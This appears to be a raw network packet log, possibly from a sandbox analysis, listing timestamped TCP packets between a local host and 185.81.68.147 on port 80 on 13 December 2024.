                                                                                                                                                                Dec 13, 2024 01:37:18.367583990 CET8049711185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:18.368159056 CET4971180192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:18.370948076 CET8049711185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:18.371049881 CET8049711185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:18.371221066 CET4971180192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:18.374371052 CET8049711185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:18.374429941 CET8049711185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:18.374535084 CET4971180192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:18.377751112 CET8049711185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:18.377876043 CET8049711185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:18.379803896 CET4971180192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:18.381000042 CET8049711185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:18.381098032 CET8049711185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:18.381443024 CET4971180192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:18.384164095 CET8049711185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:18.384264946 CET8049711185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:18.384422064 CET4971180192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:18.387437105 CET8049711185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:18.387473106 CET8049711185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:18.387659073 CET4971180192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:18.390521049 CET8049711185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:18.390628099 CET8049711185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:18.390875101 CET4971180192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:18.393734932 CET8049711185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:18.393845081 CET8049711185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:18.395221949 CET4971180192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:18.396867037 CET8049711185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:18.396975040 CET8049711185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:18.397540092 CET4971180192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:18.400068045 CET8049711185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:18.400279999 CET8049711185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:18.400835037 CET4971180192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:18.403280020 CET8049711185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:18.403384924 CET8049711185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:18.404082060 CET4971180192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:18.406435013 CET8049711185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:18.406529903 CET8049711185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:18.406820059 CET4971180192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:18.409600019 CET8049711185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:18.409720898 CET8049711185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:18.410610914 CET4971180192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:18.412791967 CET8049711185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:18.412916899 CET8049711185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:18.413080931 CET4971180192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:18.415975094 CET8049711185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:18.416089058 CET8049711185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:18.418858051 CET4971180192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:18.419135094 CET8049711185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:18.419272900 CET8049711185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:18.420990944 CET4971180192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:18.422342062 CET8049711185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:18.422458887 CET8049711185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:18.422883034 CET4971180192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:18.425537109 CET8049711185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:18.425677061 CET8049711185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:18.425781965 CET4971180192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:18.428709984 CET8049711185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:18.428867102 CET8049711185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:18.429028988 CET4971180192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:18.431912899 CET8049711185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:18.432050943 CET8049711185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:18.432322979 CET4971180192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:18.435087919 CET8049711185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:18.435209990 CET8049711185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:18.435626030 CET4971180192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:18.438235998 CET8049711185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:18.438359976 CET8049711185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:18.438529015 CET4971180192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:18.441461086 CET8049711185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:18.441565990 CET8049711185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:18.442352057 CET4971180192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:18.444608927 CET8049711185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:18.444713116 CET8049711185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:18.445060968 CET4971180192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:18.447824955 CET8049711185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:18.447942972 CET8049711185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:18.448091984 CET4971180192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:18.450982094 CET8049711185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:18.451109886 CET8049711185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:18.451292992 CET4971180192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:18.454216957 CET8049711185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:18.454284906 CET8049711185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:18.454597950 CET4971180192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:18.457343102 CET8049711185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:18.457500935 CET8049711185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:18.457814932 CET4971180192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:18.460530043 CET8049711185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:18.460618019 CET8049711185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:18.460725069 CET4971180192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:18.544532061 CET8049711185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:18.544627905 CET8049711185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:18.544795990 CET4971180192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:18.545703888 CET8049711185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:18.545841932 CET8049711185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:18.546626091 CET4971180192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:18.548249006 CET8049711185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:18.548343897 CET8049711185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:18.548681021 CET4971180192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:18.550757885 CET8049711185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:18.550890923 CET8049711185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:18.553216934 CET8049711185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:18.553344965 CET8049711185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:18.553371906 CET4971180192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:18.553531885 CET4971180192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:18.555655003 CET8049711185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:18.555761099 CET8049711185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:18.556617022 CET4971180192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:18.558043957 CET8049711185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:18.558111906 CET8049711185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:18.558496952 CET4971180192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:18.560383081 CET8049711185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:18.560492039 CET8049711185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:18.560626030 CET4971180192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:18.562691927 CET8049711185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:18.562808990 CET8049711185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:18.563941002 CET4971180192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:18.564953089 CET8049711185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:18.565112114 CET8049711185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:18.566315889 CET4971180192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:18.567212105 CET8049711185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:18.567265987 CET8049711185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:18.567840099 CET4971180192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:18.569443941 CET8049711185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:18.569560051 CET8049711185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:18.569650888 CET4971180192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:18.571614981 CET8049711185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:18.571741104 CET8049711185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:18.572077036 CET4971180192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:18.573815107 CET8049711185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:18.573914051 CET8049711185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:18.574069023 CET4971180192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:18.575956106 CET8049711185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:18.576071978 CET8049711185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:18.576231003 CET4971180192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:18.578063965 CET8049711185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:18.578191996 CET8049711185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:18.578536034 CET4971180192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:18.580235004 CET8049711185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:18.580270052 CET8049711185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:18.580836058 CET4971180192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:18.582237959 CET8049711185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:18.582343102 CET8049711185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:18.582645893 CET4971180192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:18.584325075 CET8049711185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:18.584440947 CET8049711185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:18.584593058 CET4971180192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:18.586363077 CET8049711185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:18.586500883 CET8049711185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:18.588416100 CET8049711185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:18.588469028 CET4971180192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:18.588504076 CET8049711185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:18.590420961 CET8049711185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:18.590466976 CET4971180192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:18.590492964 CET8049711185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:18.592438936 CET8049711185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:18.592485905 CET4971180192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:18.592525959 CET8049711185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:18.592823982 CET4971180192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:18.594427109 CET8049711185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:18.594531059 CET8049711185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:18.596014023 CET4971180192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:18.596461058 CET8049711185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:18.596599102 CET8049711185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:18.598490000 CET8049711185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:18.598578930 CET4971180192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:18.598583937 CET8049711185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:18.598823071 CET4971180192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:18.600518942 CET8049711185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:18.600631952 CET8049711185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:18.602570057 CET8049711185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:18.602633953 CET4971180192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:18.602679014 CET8049711185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:18.603503942 CET4971180192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:18.604568958 CET8049711185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:18.604691029 CET8049711185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:18.606570005 CET8049711185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:18.606657028 CET8049711185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:18.606695890 CET4971180192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:18.608593941 CET8049711185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:18.608741045 CET8049711185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:18.608768940 CET4971180192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:18.610610962 CET8049711185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:18.610757113 CET8049711185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:18.610799074 CET4971180192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:18.612087011 CET4971180192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:18.612658024 CET8049711185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:18.612776041 CET8049711185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:18.612983942 CET4971180192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:18.614670992 CET8049711185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:18.614831924 CET8049711185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:18.615144014 CET4971180192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:18.616667032 CET8049711185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:18.616775036 CET8049711185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:18.616868019 CET4971180192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:18.618706942 CET8049711185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:18.618766069 CET8049711185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:18.620757103 CET8049711185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:18.620800018 CET4971180192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:18.620866060 CET8049711185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:18.622756004 CET8049711185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:18.622860909 CET8049711185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:18.622900963 CET4971180192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:18.623133898 CET4971180192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:18.624783993 CET8049711185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:18.624936104 CET8049711185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:18.626801014 CET8049711185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:18.626928091 CET8049711185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:18.626970053 CET4971180192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:18.628722906 CET4971180192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:18.628815889 CET8049711185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:18.628941059 CET8049711185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:18.630837917 CET8049711185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:18.630942106 CET8049711185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:18.630980015 CET4971180192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:18.632719994 CET4971180192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:18.632862091 CET8049711185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:18.633002996 CET8049711185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:18.634881973 CET8049711185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:18.635003090 CET8049711185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:18.635051012 CET4971180192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:18.636904001 CET8049711185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:18.636955023 CET4971180192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:18.637074947 CET8049711185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:18.638936043 CET8049711185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:18.638981104 CET4971180192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:18.639075041 CET8049711185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:18.641014099 CET8049711185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:18.641067028 CET4971180192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:18.641108990 CET8049711185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:18.643012047 CET8049711185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:18.643096924 CET8049711185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:18.643138885 CET4971180192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:18.643220901 CET4971180192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:18.645031929 CET8049711185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:18.645138025 CET8049711185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:18.647108078 CET8049711185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:18.647161007 CET8049711185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:18.647209883 CET4971180192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:18.647342920 CET4971180192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:18.649028063 CET8049711185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:18.651865005 CET4971180192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:18.651865005 CET4971180192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:18.771641016 CET8049711185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:19.056854963 CET4971980192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:19.176717043 CET8049719185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:19.176810026 CET4971980192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:19.177130938 CET4971980192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:19.296927929 CET8049719185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:20.504733086 CET8049719185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:20.504746914 CET8049719185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:20.504812002 CET4971980192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:20.504849911 CET8049719185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:20.504928112 CET8049719185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:20.504937887 CET8049719185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:20.504976034 CET4971980192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:20.505074978 CET8049719185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:20.505084991 CET8049719185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:20.505099058 CET8049719185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:20.505110025 CET8049719185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:20.505121946 CET4971980192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:20.505132914 CET4971980192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:20.505281925 CET8049719185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:20.505740881 CET4971980192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:20.624737978 CET8049719185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:20.624854088 CET8049719185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:20.624908924 CET4971980192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:20.628927946 CET8049719185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:20.628993034 CET8049719185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:20.629040956 CET4971980192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:20.696851015 CET8049719185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:20.696863890 CET8049719185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:20.696917057 CET4971980192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:20.699271917 CET8049719185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:20.699379921 CET8049719185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:20.699426889 CET4971980192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:20.707681894 CET8049719185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:20.707801104 CET8049719185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:20.707969904 CET4971980192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:20.716068029 CET8049719185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:20.716164112 CET8049719185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:20.716206074 CET4971980192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:20.724405050 CET8049719185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:20.724529028 CET8049719185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:20.724571943 CET4971980192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:20.732794046 CET8049719185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:20.732877970 CET8049719185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:20.732918024 CET4971980192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:20.741187096 CET8049719185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:20.741236925 CET8049719185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:20.741307974 CET4971980192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:20.749538898 CET8049719185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:20.749640942 CET8049719185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:20.749689102 CET4971980192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:20.757935047 CET8049719185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:20.758029938 CET8049719185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:20.758119106 CET4971980192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:20.766334057 CET8049719185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:20.766436100 CET8049719185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:20.766478062 CET4971980192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:20.773569107 CET8049719185.81.68.147192.168.2.5
